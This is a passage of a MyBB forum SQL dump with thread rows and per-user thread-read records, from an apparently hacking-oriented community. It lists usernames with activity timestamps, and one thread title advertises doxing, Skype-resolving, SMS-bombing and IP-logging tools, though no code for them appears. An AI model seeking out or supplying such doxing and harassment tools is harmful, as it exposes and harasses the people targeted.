Hacking Video', '0', '0', '0', '1', 't3h jok3r', '1352535067', '7345', '1352551572', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1247', '4', 'Hey Everybody!', '0', '0', '0', '342', 'Squirt1971', '1352571921', '7398', '1352642292', 'VirtualLegend', '228', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1248', '3', 'Recent Updates', '0', '0', '0', '1', 't3h jok3r', '1352577684', '7407', '1352662110', 'iTzIpod', '82', '36', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1249', '35', 'New Avatar', '0', '0', '0', '82', 'iTzIpod', '1352580089', '7412', '1352597485', 'iTzIpod', '82', '13', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1250', '61', 'Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '0', '0', '62', 'R?????zo?', '1352588484', '7426', '1352589058', 'iTzIpod', '82', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1251', '3', '[Bug] Award Icons', '0', '0', '0', '82', 'iTzIpod', '1352598124', '7462', '1352603851', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1252', '49', '[Suggestion] Post cooldown', '0', '0', '0', '82', 'iTzIpod', '1352598223', '7463', '1352649992', 'sirchamp', '53', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1253', '7', 'Who\'s had a Toothache?', '0', '0', '0', '205', 'mothered', '1352634279', '7481', '1352663068', 'sirchamp', '53', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1254', '65', 'Who\'s watched The Social Network movie?', '0', '0', '0', '205', 'mothered', '1352634721', '7482', '1352642227', 'VirtualLegend', '228', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1255', '4', 'Wasssup?', '0', '0', '0', '345', 'ZetaHunter', '1352654955', '7495', '1352662960', 't3h jok3r', '1', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); DROP TABLE IF EXISTS mybb_threadsread; CREATE TABLE mybb_threadsread ( tid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, dateline int(10) NOT NULL, KEY tid (tid,uid), KEY dateline (dateline) ); INSERT INTO mybb_threadsread VALUES('203', '342', '1352593366'); INSERT INTO mybb_threadsread VALUES('1249', '257', '1352619070'); INSERT INTO mybb_threadsread VALUES('418', '82', '1352597515'); INSERT INTO mybb_threadsread VALUES('719', '342', '1352663803'); INSERT INTO mybb_threadsread VALUES('1078', '2', '1352433224'); INSERT INTO mybb_threadsread VALUES('1140', '61', '1352332695'); INSERT INTO mybb_threadsread VALUES('1078', '1', '1352516002'); INSERT INTO mybb_threadsread VALUES('780', '323', '1352479024'); INSERT INTO mybb_threadsread VALUES('1012', '342', '1352593443'); INSERT INTO mybb_threadsread VALUES('1078', '61', '1352516971'); INSERT INTO mybb_threadsread VALUES('861', '1', '1352607366'); INSERT INTO mybb_threadsread VALUES('1118', '82', '1352662075'); INSERT INTO mybb_threadsread VALUES('1118', '53', '1352662359'); INSERT INTO mybb_threadsread VALUES('1120', '1', '1352249456'); INSERT INTO mybb_threadsread VALUES('1176', '53', '1352313359'); INSERT INTO mybb_threadsread VALUES('1164', '53', '1352575345'); INSERT INTO mybb_threadsread VALUES('1078', '82', '1352406798'); INSERT INTO mybb_threadsread VALUES('1164', '150', '1352411003'); INSERT INTO mybb_threadsread VALUES('1145', '1', '1352427117'); INSERT INTO mybb_threadsread VALUES('1050', '257', '1352595889'); INSERT INTO mybb_threadsread VALUES('1241', '257', '1352594092'); INSERT INTO mybb_threadsread VALUES('1213', '257', '1352594014'); INSERT INTO mybb_threadsread VALUES('135', '342', '1352663807'); INSERT INTO mybb_threadsread VALUES('418', '342', '1352606071'); INSERT INTO mybb_threadsread VALUES('995', '342', '1352593475'); INSERT INTO mybb_threadsread VALUES('1164', '1', '1352260505'); INSERT INTO mybb_threadsread VALUES('1145', '262', '1352422979'); INSERT INTO mybb_threadsread VALUES('1190', '1', '1352328737'); INSERT INTO mybb_threadsread VALUES('595', '262', '1352422992'); INSERT INTO mybb_threadsread VALUES('1169', '1', '1352661619'); INSERT INTO mybb_threadsread VALUES('861', '257', '1352617534'); INSERT INTO mybb_threadsread VALUES('79', '82', '1352597032'); INSERT INTO mybb_threadsread VALUES('1173', '1', '1352661425'); INSERT INTO mybb_threadsread VALUES('861', '82', '1352604446'); INSERT INTO mybb_threadsread VALUES('1248', '257', '1352594239'); INSERT INTO mybb_threadsread VALUES('1145', '53', '1352385714'); INSERT INTO mybb_threadsread VALUES('487', '257', '1352619010'); INSERT INTO mybb_threadsread VALUES('253', '257', '1352618347'); INSERT INTO mybb_threadsread VALUES('1091', '257', '1352552973'); INSERT INTO mybb_threadsread VALUES('238', '257', '1352618907'); INSERT INTO mybb_threadsread VALUES('1165', '61', '1352328319'); INSERT INTO mybb_threadsread VALUES('249', '257', '1352618452'); INSERT INTO mybb_threadsread VALUES('1197', '257', '1352248971'); INSERT INTO mybb_threadsread VALUES('1206', '257', '1352248874'); INSERT INTO mybb_threadsread VALUES('951', '257', '1352248812'); INSERT INTO mybb_threadsread VALUES('1168', '257', '1352248744'); INSERT INTO mybb_threadsread VALUES('1120', '257', '1352248726'); INSERT INTO mybb_threadsread VALUES('1203', '257', '1352248660'); INSERT INTO mybb_threadsread VALUES('1195', '257', '1352316665'); INSERT INTO mybb_threadsread VALUES('1204', '257', '1352316821'); INSERT INTO mybb_threadsread VALUES('1190', '257', '1352248337'); INSERT INTO mybb_threadsread VALUES('1207', '257', '1352248247'); INSERT INTO mybb_threadsread VALUES('989', '258', '1352454985'); INSERT INTO mybb_threadsread VALUES('1247', '257', '1352617338'); INSERT INTO mybb_threadsread VALUES('418', '257', '1352593920'); INSERT INTO mybb_threadsread VALUES('1190', '82', '1352254920'); INSERT INTO mybb_threadsread VALUES('1190', '61', '1352293091'); INSERT INTO mybb_threadsread VALUES('234', '323', '1352476098'); INSERT INTO mybb_threadsread VALUES('26', '323', '1352479043'); INSERT INTO mybb_threadsread VALUES('1195', '324', '1352320426'); INSERT INTO mybb_threadsread VALUES('1196', '205', '1352289335'); INSERT INTO mybb_threadsread VALUES('1197', '325', '1352262353'); INSERT INTO mybb_threadsread VALUES('50', '325', '1352254627'); INSERT INTO mybb_threadsread VALUES('1197', '1', '1352249239'); INSERT INTO mybb_threadsread VALUES('1196', '1', '1352264052'); INSERT INTO mybb_threadsread VALUES('1195', '1', '1352263998'); INSERT INTO mybb_threadsread VALUES('951', '67', '1352309158'); INSERT INTO mybb_threadsread VALUES('253', '7', '1352535775'); INSERT INTO mybb_threadsread VALUES('487', '7', '1352536001'); INSERT INTO mybb_threadsread VALUES('238', '7', '1352535859'); INSERT INTO mybb_threadsread VALUES('249', '7', '1352535815'); INSERT INTO mybb_threadsread VALUES('190', '7', '1352535744'); INSERT INTO mybb_threadsread VALUES('197', '7', '1352535948'); INSERT INTO mybb_threadsread VALUES('1091', '7', '1352535902'); INSERT INTO mybb_threadsread VALUES('1204', '1', '1352391852'); INSERT INTO mybb_threadsread VALUES('1206', '62', '1352254157'); INSERT INTO mybb_threadsread VALUES('1197', '53', '1352314380'); INSERT INTO mybb_threadsread VALUES('1203', '53', '1352387090'); INSERT INTO mybb_threadsread VALUES('1149', '53', '1352659813'); INSERT INTO mybb_threadsread VALUES('1121', '53', '1352554315'); INSERT INTO mybb_threadsread VALUES('565', '53', '1352554359'); INSERT INTO mybb_threadsread VALUES('1035', '53', '1352554384'); INSERT INTO mybb_threadsread VALUES('1195', '82', '1352293410'); INSERT INTO mybb_threadsread VALUES('1197', '82', '1352254817'); INSERT INTO mybb_threadsread VALUES('1196', '82', '1352290025'); INSERT INTO mybb_threadsread VALUES('1091', '82', '1352551496'); INSERT INTO mybb_threadsread VALUES('253', '82', '1352597764'); INSERT INTO mybb_threadsread VALUES('487', '82', '1352597677'); INSERT INTO mybb_threadsread VALUES('238', '82', '1352648045'); INSERT INTO mybb_threadsread VALUES('249', '82', '1352648005'); INSERT INTO mybb_threadsread VALUES('197', '82', '1352597636'); INSERT INTO mybb_threadsread VALUES('1204', '82', '1352375096'); INSERT INTO mybb_threadsread VALUES('1206', '258', '1352526319'); INSERT INTO mybb_threadsread VALUES('1203', '1', '1352391849'); INSERT INTO mybb_threadsread VALUES('1197', '62', '1352254250'); INSERT INTO mybb_threadsread VALUES('1195', '228', '1352315329'); INSERT INTO mybb_threadsread VALUES('1203', '82', '1352255308'); INSERT INTO mybb_threadsread VALUES('496', '82', '1352255264'); INSERT INTO mybb_threadsread VALUES('936', '82', '1352255266'); INSERT INTO mybb_threadsread VALUES('1207', '82', '1352511165'); INSERT INTO mybb_threadsread VALUES('1207', '62', '1352273922'); INSERT INTO mybb_threadsread VALUES('1118', '257', '1352679635'); INSERT INTO mybb_threadsread VALUES('1207', '1', '1352252528'); INSERT INTO mybb_threadsread VALUES('253', '1', '1352678864'); INSERT INTO mybb_threadsread VALUES('197', '257', '1352618480'); INSERT INTO mybb_threadsread VALUES('1168', '1', '1352252531'); INSERT INTO mybb_threadsread VALUES('1140', '1', '1352253075'); INSERT INTO mybb_threadsread VALUES('1204', '61', '1352253381'); INSERT INTO mybb_threadsread VALUES('1162', '1', '1352253476'); INSERT INTO mybb_threadsread VALUES('1137', '1', '1352253684'); INSERT INTO mybb_threadsread VALUES('719', '61', '1352253955'); INSERT INTO mybb_threadsread VALUES('1035', '1', '1352254208'); INSERT INTO mybb_threadsread VALUES('1195', '62', '1352254279'); INSERT INTO mybb_threadsread VALUES('1091', '62', '1352254351'); INSERT INTO mybb_threadsread VALUES('48', '82', '1352255268'); INSERT INTO mybb_threadsread VALUES('1162', '61', '1352255636'); INSERT INTO mybb_threadsread VALUES('1076', '61', '1352255831'); INSERT INTO mybb_threadsread VALUES('861', '5', '1352520969'); INSERT INTO mybb_threadsread VALUES('1208', '5', '1352257163'); INSERT INTO mybb_threadsread VALUES('1209', '5', '1352530796'); INSERT INTO mybb_threadsread VALUES('1210', '5', '1352257553'); INSERT INTO mybb_threadsread VALUES('1188', '5', '1352257743'); INSERT INTO mybb_threadsread VALUES('1211', '5', '1352257875'); INSERT INTO mybb_threadsread VALUES('1212', '5', '1352258195'); INSERT INTO mybb_threadsread VALUES('1195', '61', '1352293263'); INSERT INTO mybb_threadsread VALUES('1213', '9', '1352525678'); INSERT INTO mybb_threadsread VALUES('1214', '9', '1352258707'); INSERT INTO mybb_threadsread VALUES('1215', '61', '1352405261'); INSERT INTO mybb_threadsread VALUES('1215', '9', '1352258747'); INSERT INTO mybb_threadsread VALUES('1215', '328', '1352258755'); INSERT INTO mybb_threadsread VALUES('1213', '328', '1352258769'); INSERT INTO mybb_threadsread VALUES('951', '328', '1352258786'); INSERT INTO mybb_threadsread VALUES('1094', '328', '1352258807'); INSERT INTO mybb_threadsread VALUES('212', '328', '1352258820'); INSERT INTO mybb_threadsread VALUES('1216', '9', '1352259453'); INSERT INTO mybb_threadsread VALUES('1215', '257', '1352329371'); INSERT INTO mybb_threadsread VALUES('1217', '1', '1352328715'); INSERT INTO mybb_threadsread VALUES('1218', '8', '1352260040'); INSERT INTO mybb_threadsread VALUES('1219', '1', '1352260182'); INSERT INTO mybb_threadsread VALUES('1219', '257', '1352316623'); INSERT INTO mybb_threadsread VALUES('1217', '54', '1352262632'); INSERT INTO mybb_threadsread VALUES('1215', '324', '1352264960'); INSERT INTO mybb_threadsread VALUES('1211', '324', '1352263115'); INSERT INTO mybb_threadsread VALUES('1215', '205', '1352263756'); INSERT INTO mybb_threadsread VALUES('1215', '1', '1352393453'); INSERT INTO mybb_threadsread VALUES('1215', '325', '1352264937'); INSERT INTO mybb_threadsread VALUES('1183', '325', '1352264974'); INSERT INTO mybb_threadsread VALUES('1166', '325', '1352264975'); INSERT INTO mybb_threadsread VALUES('765', '325', '1352265007'); INSERT INTO mybb_threadsread VALUES('521', '325', '1352265013'); INSERT INTO mybb_threadsread VALUES('127', '325', '1352265075'); INSERT INTO mybb_threadsread VALUES('351', '325', '1352265087'); INSERT INTO mybb_threadsread VALUES('1211', '325', '1352265272'); INSERT INTO mybb_threadsread VALUES('100', '325', '1352265291'); INSERT INTO mybb_threadsread VALUES('1212', '54', '1352346733'); INSERT INTO mybb_threadsread VALUES('1148', '54', '1352271144'); INSERT INTO mybb_threadsread VALUES('1212', '1', '1352328889'); INSERT INTO mybb_threadsread VALUES('1219', '62', '1352324754'); INSERT INTO mybb_threadsread VALUES('1214', '62', '1352454949'); INSERT INTO mybb_threadsread VALUES('1209', '62', '1352550254'); INSERT INTO mybb_threadsread VALUES('1208', '62', '1352383940'); INSERT INTO mybb_threadsread VALUES('646', '54', '1352437159'); INSERT INTO mybb_threadsread VALUES('1220', '62', '1352503916'); INSERT INTO mybb_threadsread VALUES('1204', '67', '1352285000'); INSERT INTO mybb_threadsread VALUES('1216', '67', '1352326363'); INSERT INTO mybb_threadsread VALUES('1212', '67', '1352326437'); INSERT INTO mybb_threadsread VALUES('1217', '67', '1352309185'); INSERT INTO mybb_threadsread VALUES('1217', '62', '1352291339'); INSERT INTO mybb_threadsread VALUES('1216', '62', '1352286081'); INSERT INTO mybb_threadsread VALUES('1221', '205', '1352346568'); INSERT INTO mybb_threadsread VALUES('551', '62', '1352290025'); INSERT INTO mybb_threadsread VALUES('1215', '82', '1352406789'); INSERT INTO mybb_threadsread VALUES('1216', '82', '1352290332'); INSERT INTO mybb_threadsread VALUES('1217', '82', '1352290363'); INSERT INTO mybb_threadsread VALUES('1221', '82', '1352290051'); INSERT INTO mybb_threadsread VALUES('651', '62', '1352290060'); INSERT INTO mybb_threadsread VALUES('1215', '62', '1352291042'); INSERT INTO mybb_threadsread VALUES('1221', '61', '1352330561'); INSERT INTO mybb_threadsread VALUES('1176', '61', '1352293280'); INSERT INTO mybb_threadsread VALUES('1220', '325', '1352296706'); INSERT INTO mybb_threadsread VALUES('1221', '67', '1352304244'); INSERT INTO mybb_threadsread VALUES('1208', '53', '1352474251'); INSERT INTO mybb_threadsread VALUES('1221', '53', '1352304486'); INSERT INTO mybb_threadsread VALUES('1078', '150', '1352480030'); INSERT INTO mybb_threadsread VALUES('1209', '67', '1352309235'); INSERT INTO mybb_threadsread VALUES('1078', '53', '1352385708'); INSERT INTO mybb_threadsread VALUES('1212', '53', '1352314465'); INSERT INTO mybb_threadsread VALUES('1217', '53', '1352314606'); INSERT INTO mybb_threadsread VALUES('369', '53', '1352314719'); INSERT INTO mybb_threadsread VALUES('1078', '228', '1352368831'); INSERT INTO mybb_threadsread VALUES('1208', '228', '1352389677'); INSERT INTO mybb_threadsread VALUES('1213', '228', '1352642052'); INSERT INTO mybb_threadsread VALUES('1219', '228', '1352315617'); INSERT INTO mybb_threadsread VALUES('1216', '228', '1352315656'); INSERT INTO mybb_threadsread VALUES('1210', '228', '1352315754'); INSERT INTO mybb_threadsread VALUES('1211', '228', '1352315776'); INSERT INTO mybb_threadsread VALUES('1218', '228', '1352315847'); INSERT INTO mybb_threadsread VALUES('719', '228', '1352315879'); INSERT INTO mybb_threadsread VALUES('972', '228', '1352315903'); INSERT INTO mybb_threadsread VALUES('1120', '228', '1352316049'); INSERT INTO mybb_threadsread VALUES('1221', '257', '1352316710'); INSERT INTO mybb_threadsread VALUES('1215', '228', '1352410486'); INSERT INTO mybb_threadsread VALUES('1078', '222', '1352318124'); INSERT INTO mybb_threadsread VALUES('1217', '228', '1352321633'); INSERT INTO mybb_threadsread VALUES('1212', '228', '1352322037'); INSERT INTO mybb_threadsread VALUES('1214', '228', '1352322177'); INSERT INTO mybb_threadsread VALUES('1218', '67', '1352326284'); INSERT INTO mybb_threadsread VALUES('1208', '67', '1352326605'); INSERT INTO mybb_threadsread VALUES('959', '67', '1352327482'); INSERT INTO mybb_threadsread VALUES('1218', '61', '1352328107'); INSERT INTO mybb_threadsread VALUES('1122', '61', '1352328366'); INSERT INTO mybb_threadsread VALUES('1218', '1', '1352492873'); INSERT INTO mybb_threadsread VALUES('1221', '1', '1352328882'); INSERT INTO mybb_threadsread VALUES('1216', '1', '1352328739'); INSERT INTO mybb_threadsread VALUES('1213', '1', '1352664918'); INSERT INTO mybb_threadsread VALUES('1196', '61', '1352329062'); INSERT INTO mybb_threadsread VALUES('1208', '61', '1352330576'); INSERT INTO mybb_threadsread VALUES('1120', '61', '1352331087'); INSERT INTO mybb_threadsread VALUES('1078', '100', '1352342125'); INSERT INTO mybb_threadsread VALUES('1215', '100', '1352342143'); INSERT INTO mybb_threadsread VALUES('1195', '100', '1352342163'); INSERT INTO mybb_threadsread VALUES('616', '100', '1352342197'); INSERT INTO mybb_threadsread VALUES('1078', '205', '1352346695'); INSERT INTO mybb_threadsread VALUES('1220', '205', '1352346839'); INSERT INTO mybb_threadsread VALUES('966', '61', '1352347133'); INSERT INTO mybb_threadsread VALUES('1222', '9', '1352391977'); INSERT INTO mybb_threadsread VALUES('1078', '9', '1352349637'); INSERT INTO mybb_threadsread VALUES('1223', '9', '1352350143'); INSERT INTO mybb_threadsread VALUES('1224', '9', '1352350104'); INSERT INTO mybb_threadsread VALUES('861', '9', '1352350203'); INSERT INTO mybb_threadsread VALUES('765', '7', '1352350337'); INSERT INTO mybb_threadsread VALUES('765', '257', '1352353838'); INSERT INTO mybb_threadsread VALUES('1222', '257', '1352353957'); INSERT INTO mybb_threadsread VALUES('1078', '67', '1352363395'); INSERT INTO mybb_threadsread VALUES('1222', '67', '1352363435'); INSERT INTO mybb_threadsread VALUES('1223', '67', '1352486400'); INSERT INTO mybb_threadsread VALUES('1224', '67', '1352363374'); INSERT INTO mybb_threadsread VALUES('1213', '67', '1352367329'); INSERT INTO mybb_threadsread VALUES('1099', '329', '1352371159'); INSERT INTO mybb_threadsread VALUES('1047', '329', '1352371187'); INSERT INTO mybb_threadsread VALUES('723', '329', '1352371239'); INSERT INTO mybb_threadsread VALUES('1203', '228', '1352371920'); INSERT INTO mybb_threadsread VALUES('248', '329', '1352371944'); INSERT INTO mybb_threadsread VALUES('878', '329', '1352372051'); INSERT INTO mybb_threadsread VALUES('418', '329', '1352372065'); INSERT INTO mybb_threadsread VALUES('1205', '329', '1352372104'); INSERT INTO mybb_threadsread VALUES('1081', '329', '1352372131'); INSERT INTO mybb_threadsread VALUES('262', '329', '1352372172'); INSERT INTO mybb_threadsread VALUES('1204', '228', '1352372372'); INSERT INTO mybb_threadsread VALUES('1204', '222', '1352373011'); INSERT INTO mybb_threadsread VALUES('1208', '330', '1352373384'); INSERT INTO mybb_threadsread VALUES('1208', '100', '1352375428'); INSERT INTO mybb_threadsread VALUES('1203', '100', '1352375391'); INSERT INTO mybb_threadsread VALUES('1041', '100', '1352375483'); INSERT INTO mybb_threadsread VALUES('966', '100', '1352375618'); INSERT INTO mybb_threadsread VALUES('203', '329', '1352377695'); INSERT INTO mybb_threadsread VALUES('1012', '329', '1352377741'); INSERT INTO mybb_threadsread VALUES('765', '61', '1352379351'); INSERT INTO mybb_threadsread VALUES('1047', '62', '1352383988'); INSERT INTO mybb_threadsread VALUES('1222', '53', '1352387060'); INSERT INTO mybb_threadsread VALUES('1211', '53', '1352536521'); INSERT INTO mybb_threadsread VALUES('1222', '1', '1352391879'); INSERT INTO mybb_threadsread VALUES('14', '1', '1352393480'); INSERT INTO mybb_threadsread VALUES('1225', '5', '1352393641'); INSERT INTO mybb_threadsread VALUES('1226', '5', '1352393844'); INSERT INTO mybb_threadsread VALUES('1215', '150', '1352394343'); INSERT INTO mybb_threadsread VALUES('1211', '62', '1352397060'); INSERT INTO mybb_threadsread VALUES('1215', '53', '1352399016'); INSERT INTO mybb_threadsread VALUES('765', '53', '1352399053'); INSERT INTO mybb_threadsread VALUES('1225', '82', '1352550686'); INSERT INTO mybb_threadsread VALUES('1207', '2', '1352433179'); INSERT INTO mybb_threadsread VALUES('1213', '2', '1352408253'); INSERT INTO mybb_threadsread VALUES('997', '331', '1352408752'); INSERT INTO mybb_threadsread VALUES('173', '331', '1352408757'); INSERT INTO mybb_threadsread VALUES('991', '331', '1352408759'); INSERT INTO mybb_threadsread VALUES('814', '331', '1352409494'); INSERT INTO mybb_threadsread VALUES('647', '331', '1352409541'); INSERT INTO mybb_threadsread VALUES('1160', '332', '1352412723'); INSERT INTO mybb_threadsread VALUES('1059', '332', '1352412757'); INSERT INTO mybb_threadsread VALUES('1185', '332', '1352412793'); INSERT INTO mybb_threadsread VALUES('508', '332', '1352412801'); INSERT INTO mybb_threadsread VALUES('310', '332', '1352412819'); INSERT INTO mybb_threadsread VALUES('987', '332', '1352412855'); INSERT INTO mybb_threadsread VALUES('765', '332', '1352412910'); INSERT INTO mybb_threadsread VALUES('117', '332', '1352412962'); INSERT INTO mybb_threadsread VALUES('521', '332', '1352412975'); INSERT INTO mybb_threadsread VALUES('127', '332', '1352412994'); INSERT INTO mybb_threadsread VALUES('764', '332', '1352413036'); INSERT INTO mybb_threadsread VALUES('1227', '333', '1352478373'); INSERT INTO mybb_threadsread VALUES('1207', '333', '1352413676'); INSERT INTO mybb_threadsread VALUES('1078', '333', '1352413610'); INSERT INTO mybb_threadsread VALUES('1228', '333', '1352624759'); INSERT INTO mybb_threadsread VALUES('27', '67', '1352414306'); INSERT INTO mybb_threadsread VALUES('20', '67', '1352414443'); INSERT INTO mybb_threadsread VALUES('1146', '332', '1352414845'); INSERT INTO mybb_threadsread VALUES('951', '332', '1352440747'); INSERT INTO mybb_threadsread VALUES('712', '67', '1352415084'); INSERT INTO mybb_threadsread VALUES('1228', '82', '1352495685'); INSERT INTO mybb_threadsread VALUES('1227', '82', '1352464380'); INSERT INTO mybb_threadsread VALUES('1228', '62', '1352550958'); INSERT INTO mybb_threadsread VALUES('1227', '61', '1352484165'); INSERT INTO mybb_threadsread VALUES('1228', '1', '1352492787'); INSERT INTO mybb_threadsread VALUES('1227', '1', '1352519539'); INSERT INTO mybb_threadsread VALUES('1225', '1', '1352427269'); INSERT INTO mybb_threadsread VALUES('1226', '1', '1352520745'); INSERT INTO mybb_threadsread VALUES('747', '1', '1352428115'); INSERT INTO mybb_threadsread VALUES('50', '1', '1352428985'); INSERT INTO mybb_threadsread VALUES('1115', '333', '1352431147'); INSERT INTO mybb_threadsread VALUES('119', '333', '1352431188'); INSERT INTO mybb_threadsread VALUES('1229', '333', '1352624757'); INSERT INTO mybb_threadsread VALUES('861', '333', '1352431369'); INSERT INTO mybb_threadsread VALUES('1229', '1', '1352534124'); INSERT INTO mybb_threadsread VALUES('1145', '333', '1352431732'); INSERT INTO mybb_threadsread VALUES('1204', '333', '1352431804'); INSERT INTO mybb_threadsread VALUES('1229', '334', '1352431858'); INSERT INTO mybb_threadsread VALUES('1227', '334', '1352431873'); INSERT INTO mybb_threadsread VALUES('1227', '2', '1352433237'); INSERT INTO mybb_threadsread VALUES('1226', '54', '1352436364'); INSERT INTO mybb_threadsread VALUES('359', '54', '1352437601'); INSERT INTO mybb_threadsread VALUES('1191', '54', '1352437662'); INSERT INTO mybb_threadsread VALUES('1140', '332', '1352440850'); INSERT INTO mybb_threadsread VALUES('1220', '332', '1352440959'); INSERT INTO mybb_threadsread VALUES('860', '332', '1352441115'); INSERT INTO mybb_threadsread VALUES('96', '54', '1352442870'); INSERT INTO mybb_threadsread VALUES('313', '332', '1352443157'); INSERT INTO mybb_threadsread VALUES('216', '332', '1352443171'); INSERT INTO mybb_threadsread VALUES('1102', '332', '1352443254'); INSERT INTO mybb_threadsread VALUES('1223', '332', '1352443287'); INSERT INTO mybb_threadsread VALUES('690', '332', '1352443309'); INSERT INTO mybb_threadsread VALUES('1211', '332', '1352443437'); INSERT INTO mybb_threadsread VALUES('1203', '332', '1352443512'); INSERT INTO mybb_threadsread VALUES('990', '332', '1352443622'); INSERT INTO mybb_threadsread VALUES('836', '54', '1352443834'); INSERT INTO mybb_threadsread VALUES('1225', '67', '1352445821'); INSERT INTO mybb_threadsread VALUES('1229', '228', '1352449424'); INSERT INTO mybb_threadsread VALUES('1227', '228', '1352449595'); INSERT INTO mybb_threadsread VALUES('1078', '335', '1352449573'); INSERT INTO mybb_threadsread VALUES('1203', '335', '1352449597'); INSERT INTO mybb_threadsread VALUES('1228', '228', '1352449702'); INSERT INTO mybb_threadsread VALUES('1226', '228', '1352449726'); INSERT INTO mybb_threadsread VALUES('1224', '228', '1352449926'); INSERT INTO mybb_threadsread VALUES('1228', '257', '1352450456'); INSERT INTO mybb_threadsread VALUES('1227', '257', '1352450849'); INSERT INTO mybb_threadsread VALUES('1226', '257', '1352451319'); INSERT INTO mybb_threadsread VALUES('1226', '62', '1352451205'); INSERT INTO mybb_threadsread VALUES('1230', '257', '1352619609'); INSERT INTO mybb_threadsread VALUES('1231', '335', '1352452341'); INSERT INTO mybb_threadsread VALUES('719', '62', '1352455008'); INSERT INTO mybb_threadsread VALUES('135', '62', '1352455017'); INSERT INTO mybb_threadsread VALUES('1229', '82', '1352550663'); INSERT INTO mybb_threadsread VALUES('1230', '82', '1352519281'); INSERT INTO mybb_threadsread VALUES('1231', '82', '1352500126'); INSERT INTO mybb_threadsread VALUES('1190', '336', '1352469116'); INSERT INTO mybb_threadsread VALUES('6', '336', '1352469175'); INSERT INTO mybb_threadsread VALUES('303', '336', '1352469309'); INSERT INTO mybb_threadsread VALUES('1149', '336', '1352469285'); INSERT INTO mybb_threadsread VALUES('1230', '228', '1352470024'); INSERT INTO mybb_threadsread VALUES('461', '62', '1352470115'); INSERT INTO mybb_threadsread VALUES('1032', '336', '1352470612'); INSERT INTO mybb_threadsread VALUES('1231', '258', '1352526317'); INSERT INTO mybb_threadsread VALUES('673', '54', '1352472109'); INSERT INTO mybb_threadsread VALUES('457', '54', '1352472134'); INSERT INTO mybb_threadsread VALUES('1230', '53', '1352479134'); INSERT INTO mybb_threadsread VALUES('861', '53', '1352474248'); INSERT INTO mybb_threadsread VALUES('1226', '53', '1352474302'); INSERT INTO mybb_threadsread VALUES('1097', '323', '1352474973'); INSERT INTO mybb_threadsread VALUES('1098', '323', '1352474981'); INSERT INTO mybb_threadsread VALUES('967', '323', '1352475097'); INSERT INTO mybb_threadsread VALUES('1223', '53', '1352475708'); INSERT INTO mybb_threadsread VALUES('40', '323', '1352476787'); INSERT INTO mybb_threadsread VALUES('39', '323', '1352476794'); INSERT INTO mybb_threadsread VALUES('1218', '323', '1352476996'); INSERT INTO mybb_threadsread VALUES('1230', '61', '1352490126'); INSERT INTO mybb_threadsread VALUES('1220', '61', '1352479144'); INSERT INTO mybb_threadsread VALUES('1203', '61', '1352479155'); INSERT INTO mybb_threadsread VALUES('1232', '53', '1352561683'); INSERT INTO mybb_threadsread VALUES('1232', '67', '1352486209'); INSERT INTO mybb_threadsread VALUES('861', '67', '1352486180'); INSERT INTO mybb_threadsread VALUES('1228', '67', '1352486497'); INSERT INTO mybb_threadsread VALUES('157', '61', '1352488913'); INSERT INTO mybb_threadsread VALUES('1215', '222', '1352489710'); INSERT INTO mybb_threadsread VALUES('1232', '61', '1352566379'); INSERT INTO mybb_threadsread VALUES('1233', '61', '1352521958'); INSERT INTO mybb_threadsread VALUES('1233', '53', '1352491300'); INSERT INTO mybb_threadsread VALUES('1217', '61', '1352491874'); INSERT INTO mybb_threadsread VALUES('1232', '1', '1352496647'); INSERT INTO mybb_threadsread VALUES('1230', '1', '1352678725'); INSERT INTO mybb_threadsread VALUES('1232', '82', '1352560688'); INSERT INTO mybb_threadsread VALUES('1231', '1', '1352496640'); INSERT INTO mybb_threadsread VALUES('1231', '61', '1352497096'); INSERT INTO mybb_threadsread VALUES('532', '199', '1352501430'); INSERT INTO mybb_threadsread VALUES('745', '338', '1352504168'); INSERT INTO mybb_threadsread VALUES('1183', '4', '1352517050'); INSERT INTO mybb_threadsread VALUES('765', '4', '1352517072'); INSERT INTO mybb_threadsread VALUES('1234', '4', '1352519874'); INSERT INTO mybb_threadsread VALUES('398', '4', '1352518368'); INSERT INTO mybb_threadsread VALUES('398', '100', '1352517538'); INSERT INTO mybb_threadsread VALUES('1210', '100', '1352517383'); INSERT INTO mybb_threadsread VALUES('1232', '4', '1352518299'); INSERT INTO mybb_threadsread VALUES('398', '82', '1352519301'); INSERT INTO mybb_threadsread VALUES('1185', '311', '1352518006'); INSERT INTO mybb_threadsread VALUES('137', '311', '1352518025'); INSERT INTO mybb_threadsread VALUES('500', '311', '1352518045'); INSERT INTO mybb_threadsread VALUES('507', '311', '1352518046'); INSERT INTO mybb_threadsread VALUES('466', '311', '1352518047'); INSERT INTO mybb_threadsread VALUES('95', '311', '1352518051'); INSERT INTO mybb_threadsread VALUES('156', '311', '1352518056'); INSERT INTO mybb_threadsread VALUES('82', '311', '1352518059'); INSERT INTO mybb_threadsread VALUES('20', '311', '1352518062'); INSERT INTO mybb_threadsread VALUES('1228', '4', '1352518444'); INSERT INTO mybb_threadsread VALUES('1230', '4', '1352518567'); INSERT INTO mybb_threadsread VALUES('1229', '4', '1352518667'); INSERT INTO mybb_threadsread VALUES('20', '4', '1352518753'); INSERT INTO mybb_threadsread VALUES('1201', '4', '1352519425'); INSERT INTO mybb_threadsread VALUES('1234', '1', '1352610871'); INSERT INTO mybb_threadsread VALUES('1229', '205', '1352521504'); INSERT INTO mybb_threadsread VALUES('1234', '5', '1352520923'); INSERT INTO mybb_threadsread VALUES('1235', '5', '1352522179'); INSERT INTO mybb_threadsread VALUES('19', '5', '1352521492'); INSERT INTO mybb_threadsread 